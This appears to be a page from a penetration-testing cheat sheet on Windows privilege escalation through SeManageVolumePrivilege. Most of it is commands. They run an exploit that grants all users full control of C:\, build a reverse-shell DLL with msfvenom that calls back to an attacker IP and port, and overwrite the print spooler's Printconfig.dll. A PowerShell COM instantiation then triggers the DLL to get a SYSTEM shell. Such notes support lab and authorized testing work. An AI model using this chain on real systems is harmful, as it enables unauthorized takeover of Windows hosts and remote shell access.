SeManageVolumePrivilege

Privilege Name                Description                      State   
============================= ================================ ========
SeManageVolumePrivilege       Perform volume maintenance tasks Disabled/Enabled

Grant full permissions to all users over C:\

.\SeManageVolumeExploit.exe

Furthermore replace C:\Windows\System32\spool\drivers\x64\3\Printconfig.dll and run

msfvenom -a x64 -p windows/x64/shell_reverse_tcp LHOST=192.168.45.233 LPORT=1339 -f dll -o Printconfig.dll

In command prompt

copy Printconfig.dll C:\Windows\System32\spool\drivers\x64\3\

Switch to powershell

$type = [Type]::GetTypeFromCLSID("{854A20FB-2D44-457D-992F-EF13785D2B51}")
$object = [Activator]::CreateInstance($type)

Previouswhoami /priv NextSeBackupPrivilege

Last updated 6 months ago